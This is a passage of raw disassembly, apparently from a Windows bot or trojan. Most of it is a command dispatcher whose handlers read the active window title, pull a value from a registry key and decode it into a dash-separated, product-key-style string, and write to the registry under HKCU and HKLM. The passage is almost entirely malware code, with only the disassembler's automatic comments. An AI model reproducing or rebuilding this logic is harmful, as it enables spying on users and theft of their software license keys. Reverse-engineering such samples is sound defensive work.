; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D+2D�j
mov eax, [ebp+var_4]
locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call ds:dword_4171D8 ; GetForegroundWindow
push eax
call ds:dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset dword_419E14
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset dword_419DDC
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset dword_418B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, off_41DA68
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, dword_41EC30
and eax, 0FFFFh
push eax
movsx eax, byte ptr dword_41DA48
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41EF48
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
